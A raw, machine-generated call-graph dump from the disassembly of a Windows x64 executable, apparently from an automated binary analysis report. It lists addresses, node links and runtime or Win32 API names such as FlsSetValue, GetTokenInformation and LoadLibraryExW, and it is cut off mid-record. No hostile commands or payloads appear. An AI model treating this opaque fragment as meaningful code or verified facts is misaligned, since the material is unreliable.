7ff729363515 16650->16657 16654 7ff729367330 20 API calls 16651->16654 16655 7ff729359c10 _isindst 17 API calls 16652->16655 16653->16650 16665 7ff7293635f6 __scrt_get_show_window_mode 16654->16665 16656 7ff729364649 16655->16656 16658 7ff72934b870 _log10_special 8 API calls 16657->16658 16659 7ff72935d661 16658->16659 16683 7ff729362e04 16659->16683 16660 7ff72936399f __scrt_get_show_window_mode 16661 7ff729363cdf 16663 7ff729362f20 37 API calls 16661->16663 16662 7ff729363637 memcpy_s 16678 7ff729363f7b memcpy_s __scrt_get_show_window_mode 16662->16678 16680 7ff729363a93 memcpy_s __scrt_get_show_window_mode 16662->16680 16664 7ff7293643f7 16663->16664 16671 7ff72936464c memcpy_s 37 API calls 16664->16671 16682 7ff729364452 16664->16682 16665->16660 16665->16662 16668 7ff7293543f4 _get_daylight 11 API calls 16665->16668 16666 7ff729363c8b 16666->16661 16667 7ff72936464c memcpy_s 37 API calls 16666->16667 16667->16661 16669 7ff729363a70 16668->16669 16670 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16669->16670 16670->16662 16671->16682 16672 7ff7293645d8 16674 7ff72936713c 37 API calls 16672->16674 16673 7ff7293543f4 11 API calls _get_daylight 16673->16680 16674->16657 16675 7ff7293543f4 11 API calls _get_daylight 16675->16678 16676 7ff729359bf0 37 API calls _invalid_parameter_noinfo 16676->16680 16677 7ff729362f20 37 API calls 16677->16682 16678->16661 16678->16666 16678->16675 16679 7ff729359bf0 37 API calls _invalid_parameter_noinfo 16678->16679 16679->16678 16680->16666 16680->16673 16680->16676 16681 7ff72936464c memcpy_s 37 API calls 16681->16682 16682->16672 16682->16677 16682->16681 16684 7ff729362e23 16683->16684 16685 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16684->16685 16686 7ff729362e4e memcpy_s 16684->16686 16685->16686 16686->16606 16688 7ff72935d4e8 memcpy_s 16687->16688 16689 7ff72935d5a2 memcpy_s __scrt_get_show_window_mode 16688->16689 16690 7ff729353ae0 45 API calls 16688->16690 16689->16611 16690->16689 16692 7ff72935d23b 16691->16692 16697 7ff72935d288 memcpy_s 16691->16697 16693 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16692->16693 16694 7ff72935d267 16693->16694 16694->16611 16695 7ff72935d2f3 16696 7ff7293597b4 __std_exception_copy 37 API calls 16695->16696 16701 7ff72935d335 memcpy_s 16696->16701 16697->16695 16698 7ff729353ae0 45 API calls 16697->16698 16698->16695 16699 7ff729359c10 _isindst 17 API calls 16700 7ff72935d3e0 16699->16700 16701->16699 16703 7ff72934ff6e 16702->16703 16704 7ff72934ff7f 16702->16704 16703->16516 16704->16703 16705 7ff72935c90c _fread_nolock 12 API calls 16704->16705 16706 7ff72934ffb0 16705->16706 16707 7ff72934ffc4 16706->16707 16708 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16706->16708 16709 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16707->16709 16708->16707 16709->16703 16711 7ff729353a8e 16710->16711 16712 7ff729353a86 16710->16712 16711->16530 16713 7ff729353ae0 45 API calls 16712->16713 16713->16711 16715 7ff72935cce1 16714->16715 16717 7ff729353b1f 16714->16717 16715->16717 16722 7ff729362614 16715->16722 16718 7ff72935cd34 16717->16718 16719 7ff72935cd4d 16718->16719 16720 7ff729353b2f 16718->16720 16719->16720 16757 7ff729361960 16719->16757 16720->16452 16734 7ff72935a460 GetLastError 16722->16734 16726 7ff72936266e 16726->16717 16735 7ff72935a484 FlsGetValue 16734->16735 16736 7ff72935a4a1 FlsSetValue 16734->16736 16737 7ff72935a49b 16735->16737 16753 7ff72935a491 16735->16753 16738 7ff72935a4b3 16736->16738 16736->16753 16737->16736 16740 7ff72935dea8 _get_daylight 11 API calls 16738->16740 16739 7ff72935a50d SetLastError 16742 7ff72935a52d 16739->16742 16743 7ff72935a51a 16739->16743 16741 7ff72935a4c2 16740->16741 16745 7ff72935a4e0 FlsSetValue 16741->16745 16746 7ff72935a4d0 FlsSetValue 16741->16746 16744 7ff729359814 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16742->16744 16743->16726 16756 7ff72935f5e8 EnterCriticalSection 16743->16756 16747 7ff72935a532 16744->16747 16749 7ff72935a4ec FlsSetValue 16745->16749 16750 7ff72935a4fe 16745->16750 16748 7ff72935a4d9 16746->16748 16751 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16748->16751 16749->16748 16752 7ff72935a204 _get_daylight 11 API calls 16750->16752 16751->16753 16754 7ff72935a506 16752->16754 16753->16739 16755 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16754->16755 16755->16739 16758 7ff72935a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16757->16758 16759 7ff729361969 16758->16759 16766 7ff729366098 16760->16766 16765 7ff72935ebb9 MultiByteToWideChar 16763->16765 16769 7ff7293660fc 16766->16769 16767 7ff72934b870 _log10_special 8 API calls 16768 7ff72935f3cd 16767->16768 16768->16554 16769->16767 16771 7ff72935031d 16770->16771 16772 7ff72935032f 16770->16772 16773 7ff7293543f4 _get_daylight 11 API calls 16771->16773 16775 7ff72935033d 16772->16775 16779 7ff729350379 16772->16779 16774 7ff729350322 16773->16774 16776 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16774->16776 16777 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16775->16777 16784 7ff72935032d 16776->16784 16777->16784 16778 7ff7293506f5 16780 7ff7293543f4 _get_daylight 11 API calls 16778->16780 16778->16784 16779->16778 16781 7ff7293543f4 _get_daylight 11 API calls 16779->16781 16782 7ff729350989 16780->16782 16783 7ff7293506ea 16781->16783 16785 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16782->16785 16786 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16783->16786 16784->16416 16785->16784 16786->16778 16788 7ff72934fa24 16787->16788 16817 7ff72934f784 16788->16817 16790 7ff72934fa3d 16790->15974 16829 7ff72934f6dc 16791->16829 16795 7ff72934277c 16794->16795 16796 7ff7293543f4 _get_daylight 11 API calls 16795->16796 16797 7ff729342799 16796->16797 16843 7ff729353ca4 16797->16843 16802 7ff729341bf0 49 API calls 16803 7ff729342807 16802->16803 16804 7ff7293486b0 2 API calls 16803->16804 16805 7ff72934281f 16804->16805 16806 7ff72934282c MessageBoxW 16805->16806 16807 7ff729342843 MessageBoxA 16805->16807 16808 7ff729342855 16806->16808 16807->16808 16809 7ff72934b870 _log10_special 8 API calls 16808->16809 16810 7ff729342865 16809->16810 16810->16003 16812 7ff72934f439 16811->16812 16814 7ff729341b06 16811->16814 16813 7ff7293543f4 _get_daylight 11 API calls 16812->16813 16815 7ff72934f43e 16813->16815 16814->16002 16814->16003 16816 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16815->16816 16816->16814 16818 7ff72934f7ee 16817->16818 16819 7ff72934f7ae 16817->16819 16818->16819 16821 7ff72934f7fa 16818->16821 16820 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16819->16820 16822 7ff72934f7d5 16820->16822 16828 7ff72935477c EnterCriticalSection 16821->16828 16822->16790 16830 7ff7293419b9 16829->16830 16831 7ff72934f706 16829->16831 16830->15980 16830->15981 16831->16830 16832 7ff72934f715 __scrt_get_show_window_mode 16831->16832 16833 7ff72934f752 16831->16833 16836 7ff7293543f4 _get_daylight 11 API calls 16832->16836 16842 7ff72935477c EnterCriticalSection 16833->16842 16838 7ff72934f72a 16836->16838 16840 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16838->16840 16840->16830 16845 7ff729353cfe 16843->16845 16844 7ff729353d23 16846 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16844->16846 16845->16844 16847 7ff729353d5f 16845->16847 16849 7ff729353d4d 16846->16849 16873 7ff729351f30 16847->16873 16851 7ff72934b870 _log10_special 8 API calls 16849->16851 16850 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16850->16849 16853 7ff7293427d8 16851->16853 16861 7ff729354480 16853->16861 16854 7ff729353e60 16856 7ff729353e3c 16854->16856 16857 7ff729353e6a 16854->16857 16855 7ff729353e08 16855->16856 16859 7ff729353e11 16855->16859 16856->16850 16860 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16857->16860 16858 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16858->16849 16859->16858 16860->16849 16862 7ff72935a5d8 _get_daylight 11 API calls 16861->16862 16863 7ff729354497 16862->16863 16864 7ff72935dea8 _get_daylight 11 API calls 16863->16864 16867 7ff7293544d7 16863->16867 16870 7ff7293427df 16863->16870 16865 7ff7293544cc 16864->16865 16866 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16865->16866 16866->16867 16867->16870 17011 7ff72935df30 16867->17011 16870->16802 16871 7ff729359c10 _isindst 17 API calls 16872 7ff72935451c 16871->16872 16874 7ff729351f6e 16873->16874 16875 7ff729351f5e 16873->16875 16876 7ff729351f77 16874->16876 16885 7ff729351fa5 16874->16885 16878 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16875->16878 16879 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16876->16879 16877 7ff729351f9d 16877->16854 16877->16855 16877->16856 16877->16859 16878->16877 16879->16877 16880 7ff729353ae0 45 API calls 16880->16885 16882 7ff729352254 16884 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16882->16884 16884->16875 16885->16875 16885->16877 16885->16880 16885->16882 16887 7ff7293528c0 16885->16887 16913 7ff729352588 16885->16913 16943 7ff729351e10 16885->16943 16888 7ff729352975 16887->16888 16889 7ff729352902 16887->16889 16892 7ff72935297a 16888->16892 16893 7ff7293529cf 16888->16893 16890 7ff729352908 16889->16890 16891 7ff72935299f 16889->16891 16898 7ff72935290d 16890->16898 16901 7ff7293529de 16890->16901 16960 7ff729350e70 16891->16960 16894 7ff72935297c 16892->16894 16895 7ff7293529af 16892->16895 16893->16891 16893->16901 16911 7ff729352938 16893->16911 16897 7ff72935291d 16894->16897 16904 7ff72935298b 16894->16904 16967 7ff729350a60 16895->16967 16912 7ff729352a0d 16897->16912 16946 7ff729353224 16897->16946 16898->16897 16902 7ff729352950 16898->16902 16898->16911 16901->16912 16974 7ff729351280 16901->16974 16902->16912 16956 7ff7293536e0 16902->16956 16904->16891 16906 7ff729352990 16904->16906 16908 7ff729353878 37 API calls 16906->16908 16906->16912 16907 7ff72934b870 _log10_special 8 API calls 16909 7ff729352ca3 16907->16909 16908->16911 16909->16885 16911->16912 16981 7ff72935db68 16911->16981 16912->16907 16914 7ff7293525a9 16913->16914 16915 7ff729352593 16913->16915 16916 7ff7293525e7 16914->16916 16919 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16914->16919 16915->16916 16917 7ff729352975 16915->16917 16918 7ff729352902 16915->16918 16916->16885 16922 7ff72935297a 16917->16922 16923 7ff7293529cf 16917->16923 16920 7ff729352908 16918->16920 16921 7ff72935299f 16918->16921 16919->16916 16930 7ff72935290d 16920->16930 16932 7ff7293529de 16920->16932 16926 7ff729350e70 38 API calls 16921->16926 16924 7ff72935297c 16922->16924 16925 7ff7293529af 16922->16925 16923->16921 16923->16932 16941 7ff729352938 16923->16941 16927 7ff72935291d 16924->16927 16934 7ff72935298b 16924->16934 16928 7ff729350a60 38 API calls 16925->16928 16926->16941 16929 7ff729353224 47 API calls 16927->16929 16942 7ff729352a0d 16927->16942 16928->16941 16929->16941 16930->16927 16931 7ff729352950 16930->16931 16930->16941 16935 7ff7293536e0 47 API calls 16931->16935 16931->16942 16933 7ff729351280 38 API calls 16932->16933 16932->16942 16933->16941 16934->16921 16936 7ff729352990 16934->16936 16935->16941 16938 7ff729353878 37 API calls 16936->16938 16936->16942 16937 7ff72934b870 _log10_special 8 API calls 16939 7ff729352ca3 16937->16939 16938->16941 16939->16885 16940 7ff72935db68 47 API calls 16940->16941 16941->16940 16941->16942 16942->16937 16994 7ff729350034 16943->16994 16947 7ff729353246 16946->16947 16948 7ff72934fea0 12 API calls 16947->16948 16949 7ff72935328e 16948->16949 16950 7ff72935d880 46 API calls 16949->16950 16951 7ff729353361 16950->16951 16952 7ff729353ae0 45 API calls 16951->16952 16954 7ff729353383 16951->16954 16952->16954 16953 7ff729353ae0 45 API calls 16955 7ff72935340c 16953->16955 16954->16953 16954->16954 16954->16955 16955->16911 16957 7ff7293536f8 16956->16957 16959 7ff729353760 16956->16959 16958 7ff72935db68 47 API calls 16957->16958 16957->16959 16958->16959 16959->16911 16961 7ff729350ea3 16960->16961 16962 7ff729350ed2 16961->16962 16964 7ff729350f8f 16961->16964 16963 7ff72934fea0 12 API calls 16962->16963 16966 7ff729350f0f 16962->16966 16963->16966 16965 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16964->16965 16965->16966 16966->16911 16968 7ff729350a93 16967->16968 16969 7ff729350ac2 16968->16969 16971 7ff729350b7f 16968->16971 16970 7ff72934fea0 12 API calls 16969->16970 16973 7ff729350aff 16969->16973 16970->16973 16972 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16971->16972 16972->16973 16973->16911 16975 7ff7293512b3 16974->16975 16976 7ff7293512e2 16975->16976 16978 7ff72935139f 16975->16978 16977 7ff72934fea0 12 API calls 16976->16977 16980 7ff72935131f 16976->16980 16977->16980 16979 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16978->16979 16979->16980 16980->16911 16982 7ff72935db90 16981->16982 16983 7ff72935dbd5 16982->16983 16985 7ff729353ae0 45 API calls 16982->16985 16987 7ff72935db95 __scrt_get_show_window_mode 16982->16987 16990 7ff72935dbbe __scrt_get_show_window_mode 16982->16990 16983->16987 16983->16990 16991 7ff72935faf8 16983->16991 16984 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16984->16987 16985->16983 16987->16911 16990->16984 16990->16987 16993 7ff72935fb1c WideCharToMultiByte 16991->16993 16995 7ff729350073 16994->16995 16996 7ff729350061 16994->16996 16999 7ff729350080 16995->16999 17002 7ff7293500bd 16995->17002 16997 7ff7293543f4 _get_daylight 11 API calls 16996->16997 16998 7ff729350066 16997->16998 17001 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 16998->17001 17000 7ff729359b24 _invalid_parameter_noinfo 37 API calls 16999->17000 17009 7ff729350071 17000->17009 17001->17009 17003 7ff729350166 17002->17003 17004 7ff7293543f4 _get_daylight 11 API calls 17002->17004 17005 7ff7293543f4 _get_daylight 11 API calls 17003->17005 17003->17009 17006 7ff72935015b 17004->17006 17007 7ff729350210 17005->17007 17008 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17006->17008 17010 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17007->17010 17008->17003 17009->16885 17010->17009 17015 7ff72935df4d 17011->17015 17012 7ff72935df52 17013 7ff7293544fd 17012->17013 17014 7ff7293543f4 _get_daylight 11 API calls 17012->17014 17013->16870 17013->16871 17016 7ff72935df5c 17014->17016 17015->17012 17015->17013 17018 7ff72935df9c 17015->17018 17017 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17016->17017 17017->17013 17018->17013 17019 7ff7293543f4 _get_daylight 11 API calls 17018->17019 17019->17016 17021 7ff729357568 17020->17021 17022 7ff729357555 17020->17022 17030 7ff7293571cc 17021->17030 17024 7ff7293543f4 _get_daylight 11 API calls 17022->17024 17025 7ff72935755a 17024->17025 17028 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17025->17028 17026 7ff729357566 17026->16021 17028->17026 17037 7ff72935f5e8 EnterCriticalSection 17030->17037 17039 7ff729347b91 GetTokenInformation 17038->17039 17040 7ff729347c13 __vcrt_freefls 17038->17040 17041 7ff729347bbd 17039->17041 17042 7ff729347bb2 GetLastError 17039->17042 17043 7ff729347c2c 17040->17043 17044 7ff729347c26 CloseHandle 17040->17044 17041->17040 17045 7ff729347bd9 GetTokenInformation 17041->17045 17042->17040 17042->17041 17043->16030 17044->17043 17045->17040 17046 7ff729347bfc 17045->17046 17046->17040 17047 7ff729347c06 ConvertSidToStringSidW 17046->17047 17047->17040 17333 7ff729343f70 108 API calls 17332->17333 17334 7ff729341463 17333->17334 17335 7ff72934148c 17334->17335 17336 7ff72934146b 17334->17336 17337 7ff72934f9f4 73 API calls 17335->17337 17338 7ff7293425f0 53 API calls 17336->17338 17339 7ff7293414a1 17337->17339 17340 7ff72934147b 17338->17340 17341 7ff7293414c1 17339->17341 17342 7ff7293414a5 17339->17342 17340->16089 17344 7ff7293414f1 17341->17344 17345 7ff7293414d1 17341->17345 17343 7ff729342760 53 API calls 17342->17343 17351 7ff7293414bc __vcrt_freefls 17343->17351 17348 7ff7293414f7 17344->17348 17353 7ff72934150a 17344->17353 17346 7ff729342760 53 API calls 17345->17346 17346->17351 17347 7ff72934f36c 74 API calls 17349 7ff729341584 17347->17349 17356 7ff7293411f0 17348->17356 17349->16089 17351->17347 17352 7ff72934f6bc _fread_nolock 53 API calls 17352->17353 17353->17351 17353->17352 17354 7ff729341596 17353->17354 17355 7ff729342760 53 API calls 17354->17355 17355->17351 17357 7ff729341248 17356->17357 17358 7ff729341277 17357->17358 17359 7ff72934124f 17357->17359 17362 7ff7293412ad 17358->17362 17363 7ff729341291 17358->17363 17360 7ff7293425f0 53 API calls 17359->17360 17361 7ff729341262 17360->17361 17361->17351 17365 7ff7293412bf 17362->17365 17372 7ff7293412db memcpy_s 17362->17372 17364 7ff729342760 53 API calls 17363->17364 17368 7ff7293412a8 __vcrt_freefls 17364->17368 17368->17351 17372->17368 17394 7ff729343f1a 17393->17394 17395 7ff7293486b0 2 API calls 17394->17395 17396 7ff729343f3f 17395->17396 17397 7ff72934b870 _log10_special 8 API calls 17396->17397 17398 7ff729343f67 17397->17398 17398->16114 17401 7ff72934753e 17399->17401 17400 7ff729347662 17403 7ff72934b870 _log10_special 8 API calls 17400->17403 17401->17400 17402 7ff729341bf0 49 API calls 17401->17402 17407 7ff7293475c5 17402->17407 17404 7ff729347693 17403->17404 17404->16114 17405 7ff729341bf0 49 API calls 17405->17407 17406 7ff729343f10 10 API calls 17406->17407 17407->17400 17407->17405 17407->17406 17408 7ff72934761b 17407->17408 17409 7ff7293486b0 2 API calls 17408->17409 17410 7ff729347633 CreateDirectoryW 17409->17410 17410->17400 17410->17407 17412 7ff7293415f7 17411->17412 17413 7ff7293415d3 17411->17413 17414 7ff729343f70 108 API calls 17412->17414 17500 7ff729341050 17413->17500 17416 7ff72934160b 17414->17416 17419 7ff72934163b 17416->17419 17420 7ff729341613 17416->17420 17417 7ff7293415d8 17418 7ff7293415ee 17417->17418 17421 7ff7293425f0 53 API calls 17417->17421 17418->16114 17423 7ff729343f70 108 API calls 17419->17423 17422 7ff729342760 53 API calls 17420->17422 17421->17418 17424 7ff72934162a 17422->17424 17425 7ff72934164f 17423->17425 17424->16114 17426 7ff729341657 17425->17426 17427 7ff729341671 17425->17427 17429 7ff7293425f0 53 API calls 17426->17429 17428 7ff72934f9f4 73 API calls 17427->17428 17450 7ff72934694b 17449->17450 17452 7ff729346904 17449->17452 17450->16114 17452->17450 17539 7ff729354250 17452->17539 17454 7ff729343b51 17453->17454 17455 7ff729343e90 49 API calls 17454->17455 17456 7ff729343b8b 17455->17456 17457 7ff729343e90 49 API calls 17456->17457 17458 7ff729343b9b 17457->17458 17459 7ff729343bbd 17458->17459 17460 7ff729343bec 17458->17460 17570 7ff729343ac0 17459->17570 17462 7ff729343ac0 51 API calls 17460->17462 17463 7ff729343bea 17462->17463 17498 7ff729341bf0 49 API calls 17497->17498 17499 7ff729343e24 17498->17499 17499->16114 17501 7ff729343f70 108 API calls 17500->17501 17502 7ff72934108b 17501->17502 17503 7ff7293410a8 17502->17503 17504 7ff729341093 17502->17504 17506 7ff72934f9f4 73 API calls 17503->17506 17505 7ff7293425f0 53 API calls 17504->17505 17510 7ff7293410a3 __vcrt_freefls 17505->17510 17507 7ff7293410bd 17506->17507 17508 7ff7293410c1 17507->17508 17509 7ff7293410dd 17507->17509 17510->17417 17540 7ff72935425d 17539->17540 17541 7ff72935428a 17539->17541 17543 7ff7293543f4 _get_daylight 11 API calls 17540->17543 17551 7ff729354214 17540->17551 17542 7ff7293542ad 17541->17542 17545 7ff7293542c9 17541->17545 17544 7ff7293543f4 _get_daylight 11 API calls 17542->17544 17546 7ff729354267 17543->17546 17547 7ff7293542b2 17544->17547 17554 7ff729354178 17545->17554 17549 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17546->17549 17552 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17547->17552 17550 7ff729354272 17549->17550 17550->17452 17551->17452 17553 7ff7293542bd 17552->17553 17553->17452 17555 7ff72935419c 17554->17555 17561 7ff729354197 17554->17561 17556 7ff72935a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17555->17556 17555->17561 17557 7ff7293541b7 17556->17557 17561->17553 17571 7ff729343ae6 17570->17571 17634 7ff72934be12 RtlLookupFunctionEntry 17633->17634 17635 7ff72934be28 RtlVirtualUnwind 17634->17635 17636 7ff72934bc2b 17634->17636 17635->17634 17635->17636 17637 7ff72934bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17636->17637 17639 7ff7293551d8 17638->17639 17640 7ff7293551fe 17639->17640 17643 7ff729355231 17639->17643 17641 7ff7293543f4 _get_daylight 11 API calls 17640->17641 17642 7ff729355203 17641->17642 17646 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 17642->17646 17644 7ff729355237 17643->17644 17645 7ff729355244 17643->17645 17647 7ff7293543f4 _get_daylight 11 API calls 17644->17647 17657 7ff729359f38 17645->17657 17656 7ff729343fc6 17646->17656 17647->17656 17656->16150 17670 7ff72935f5e8 EnterCriticalSection 17657->17670 18030 7ff729356c08 18029->18030 18033 7ff7293566e4 18030->18033 18032 7ff729356c21 18032->16160 18034 7ff72935672e 18033->18034 18035 7ff7293566ff 18033->18035 18043 7ff72935477c EnterCriticalSection 18034->18043 18036 7ff729359b24 _invalid_parameter_noinfo 37 API calls 18035->18036 18038 7ff72935671f 18036->18038 18038->18032 18045 7ff72934f163 18044->18045 18047 7ff72934f191 18044->18047 18046 7ff729359b24 _invalid_parameter_noinfo 37 API calls 18045->18046 18048 7ff72934f183 18046->18048 18047->18048 18054 7ff72935477c EnterCriticalSection 18047->18054 18048->16164 18056 7ff7293486b0 2 API calls 18055->18056 18057 7ff7293481b4 LoadLibraryExW 18056->18057 18058 7ff7293481d3 __vcrt_freefls 18057->18058 18058->16194 18060 7ff729346ef3 GetProcAddress 18059->18060 18061 7ff729346ec9 18059->18061 18060->18061 18062 7ff729346f18 GetProcAddress 18060->18062 18063 7ff7293429e0 51 API calls 18061->18063 18062->18061 18064 7ff729346f3d GetProcAddress 18062->18064 18065 7ff729346ee3 18063->18065 18064->18061 18065->16200 18125 7ff729345b05 18124->18125 18126 7ff729341bf0 49 API calls 18125->18126 18127 7ff729345b41 18126->18127 18128 7ff729345b4a 18127->18128 18129 7ff729345b6d 18127->18129 18130 7ff7293425f0 53 API calls 18128->18130 18131 7ff729343fe0 49 API calls 18129->18131 18147 7ff729345b63 18130->18147 18132 7ff729345b85 18131->18132 18133 7ff729345ba3 18132->18133 18136 7ff7293425f0 53 API calls 18132->18136 18134 7ff729343f10 10 API calls 18133->18134 18137 7ff729345bad 18134->18137 18135 7ff72934b870 _log10_special 8 API calls 18138 7ff72934308e 18135->18138 18136->18133 18139 7ff729345bbb 18137->18139 18140 7ff7293481a0 3 API calls 18137->18140 18138->16234 18155 7ff729345c80 18138->18155 18141 7ff729343fe0 49 API calls 18139->18141 18140->18139 18142 7ff729345bd4 18141->18142 18143 7ff729345bf9 18142->18143 18144 7ff729345bd9 18142->18144 18146 7ff7293481a0 3 API calls 18143->18146 18145 7ff7293425f0 53 API calls 18144->18145 18145->18147 18148 7ff729345c06 18146->18148 18147->18135 18294 7ff729344c80 18155->18294 18157 7ff729345cba 18158 7ff729345cc2 18157->18158 18159 7ff729345cd3 18157->18159 18160 7ff7293425f0 53 API calls 18158->18160 18301 7ff729344450 18159->18301 18296 7ff729344cac 18294->18296 18295 7ff729344cb4 18295->18157 18296->18295 18299 7ff729344e54 18296->18299 18332 7ff729355db4 18296->18332 18297 7ff729345017 __vcrt_freefls 18297->18157 18298 7ff729344180 47 API calls 18298->18299 18299->18297 18299->18298 18333 7ff729355de4 18332->18333 18336 7ff7293552b0 18333->18336 18337 7ff7293552f3 18336->18337 18338 7ff7293552e1 18336->18338 18412->16237 18414 7ff72935a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18413->18414 18415 7ff7293596f1 18414->18415 18418 7ff729359814 18415->18418 18427 7ff729362960 18418->18427 18453 7ff729362918 18427->18453 18458 7ff72935f5e8 EnterCriticalSection 18453->18458 18462 7ff72935fbd8 18463 7ff72935fbfc 18462->18463 18466 7ff72935fc0c 18462->18466 18464 7ff7293543f4 _get_daylight 11 API calls 18463->18464 18484 7ff72935fc01 18464->18484 18465 7ff72935feec 18468 7ff7293543f4 _get_daylight 11 API calls 18465->18468 18466->18465 18467 7ff72935fc2e 18466->18467 18469 7ff72935fc4f 18467->18469 18593 7ff729360294 18467->18593 18470 7ff72935fef1 18468->18470 18473 7ff72935fcc1 18469->18473 18475 7ff72935fc75 18469->18475 18480 7ff72935fcb5 18469->18480 18472 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18470->18472 18472->18484 18477 7ff72935dea8 _get_daylight 11 API calls 18473->18477 18494 7ff72935fc84 18473->18494 18474 7ff72935fd6e 18483 7ff72935fd8b 18474->18483 18491 7ff72935fddd 18474->18491 18608 7ff7293589d8 18475->18608 18481 7ff72935fcd7 18477->18481 18479 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18479->18484 18480->18474 18480->18494 18614 7ff72936643c 18480->18614 18485 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18481->18485 18488 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18483->18488 18489 7ff72935fce5 18485->18489 18486 7ff72935fc9d 18486->18480 18493 7ff729360294 45 API calls 18486->18493 18487 7ff72935fc7f 18490 7ff7293543f4 _get_daylight 11 API calls 18487->18490 18492 7ff72935fd94 18488->18492 18489->18480 18489->18494 18496 7ff72935dea8 _get_daylight 11 API calls 18489->18496 18490->18494 18491->18494 18495 7ff7293626ec 40 API calls 18491->18495 18503 7ff72935fd99 18492->18503 18650 7ff7293626ec 18492->18650 18493->18480 18494->18479 18497 7ff72935fe1a 18495->18497 18498 7ff72935fd07 18496->18498 18499 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18497->18499 18501 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18498->18501 18502 7ff72935fe24 18499->18502 18501->18480 18502->18494 18502->18503 18504 7ff72935fee0 18503->18504 18508 7ff72935dea8 _get_daylight 11 API calls 18503->18508 18506 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18504->18506 18505 7ff72935fdc5 18507 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18505->18507 18506->18484 18507->18503 18509 7ff72935fe68 18508->18509 18510 7ff72935fe79 18509->18510 18511 7ff72935fe70 18509->18511 18513 7ff7293597b4 __std_exception_copy 37 API calls 18510->18513 18512 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18511->18512 18514 7ff72935fe77 18512->18514 18515 7ff72935fe88 18513->18515 18520 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18514->18520 18516 7ff72935ff1b 18515->18516 18517 7ff72935fe90 18515->18517 18519 7ff729359c10 _isindst 17 API calls 18516->18519 18659 7ff729366554 18517->18659 18522 7ff72935ff2f 18519->18522 18520->18484 18525 7ff72935ff58 18522->18525 18532 7ff72935ff68 18522->18532 18523 7ff72935fed8 18526 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18523->18526 18524 7ff72935feb7 18527 7ff7293543f4 _get_daylight 11 API calls 18524->18527 18528 7ff7293543f4 _get_daylight 11 API calls 18525->18528 18526->18504 18530 7ff72935febc 18527->18530 18529 7ff72935ff5d 18528->18529 18533 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18530->18533 18531 7ff72936024b 18535 7ff7293543f4 _get_daylight 11 API calls 18531->18535 18532->18531 18534 7ff72935ff8a 18532->18534 18533->18514 18536 7ff72935ffa7 18534->18536 18678 7ff72936037c 18534->18678 18537 7ff729360250 18535->18537 18540 7ff72936001b 18536->18540 18542 7ff72935ffcf 18536->18542 18548 7ff72936000f 18536->18548 18539 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18537->18539 18539->18529 18544 7ff729360043 18540->18544 18549 7ff72935dea8 _get_daylight 11 API calls 18540->18549 18560 7ff72935ffde 18540->18560 18541 7ff7293600ce 18551 7ff7293600eb 18541->18551 18561 7ff72936013e 18541->18561 18693 7ff729358a14 18542->18693 18546 7ff72935dea8 _get_daylight 11 API calls 18544->18546 18544->18548 18544->18560 18552 7ff729360065 18546->18552 18547 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18547->18529 18548->18541 18548->18560 18699 7ff7293662fc 18548->18699 18553 7ff729360035 18549->18553 18557 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18551->18557 18558 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18552->18558 18559 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18553->18559 18554 7ff72935fff7 18554->18548 18563 